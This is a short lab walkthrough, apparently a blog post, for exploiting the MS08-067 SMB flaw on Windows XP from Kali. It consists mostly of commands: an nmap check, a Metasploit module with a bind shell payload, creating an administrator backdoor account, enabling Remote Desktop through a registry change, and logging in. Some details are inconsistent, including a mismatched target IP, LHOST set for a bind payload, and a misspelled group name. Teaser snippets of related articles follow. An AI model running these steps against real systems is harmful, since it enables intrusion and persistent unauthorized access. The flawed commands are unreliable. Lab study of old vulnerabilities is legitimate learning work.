tags: Vulnerability recurrence Safety
Sphere of influence:
Windows 2000
Windows XP
Windows Server 2003
Reproduce the environment
win xp :192.168.31.49
kali :192.168.31.117
recurrent:
Does nmap scan vulnerability exist:
nmap -n -p 445 --script smb-vuln-ms08-067 192.168.31.49 --open

Open metasploite, find ms08-067 module and enter:
root@kali:~# msfconsole
msf5 > search ms08-067
msf5 > use exploit/windows/smb/ms08_067_netapi



Target ip:set RHOST 192.168.44.49
Port:set RPORT 445
payload:set payload generic/shell_bind_tcp 
Attack machine ip, type, configuration information Start:
set LHOST 192.168.31.117
set target 0
show options
exploit


Create an admin user:
net user h 123 /add
net user localgroup administratos h /add

Open port 3389:
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

Use h user connection to log in
rdesktop 192.168.31.49


Reference link:
https://blog.csdn.net/Eastmount/article/details/104834931
https://blog.csdn.net/s0mor/article/details/98937473
This vulnerability of ms08-067 is one of the most basic vulnerabilities when we are learning msf. Many tutorials will mention this vulnerability, but this vulnerability is very picky about the reprodu...
The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability." If a user receives a specially crafted RPC request on an affected system, t...
#windowsxpsp3 system MS08-067 vulnerability test Vulnerability description The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". ...
lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...
ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...
MS08-067 Remote Overflow Vulnerability Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...
1. Find ms08-067: 2. Use: 3. Select the payload: (At the beginning, there is a difference between windows / shell / ... and windows / meterpreter / reverse_tpc) 4. View options (yes is required): 5. E...
0x01 experimental environment Attack machine: kali linux ip:10.10.10.131 Target machine: windows server 2003 ip:10.10.10.130 0x02 configure exploit msf > use exploit/windows/smb/ms08_067_netapi&nbs...
Put the previous experiments and written in the note in the cloud, put it on the CSDN First, an experimental environment Target: Windows XP SP3 Professional (Close Windows self-contained firewall!!!) ...
MS08-067 Vulnerability: It is a vulnerability in a remote process call (RPC) service. When calling the NetPathCanonicalize function in the SMB channel, the vulnerability is triggered, causing the use ...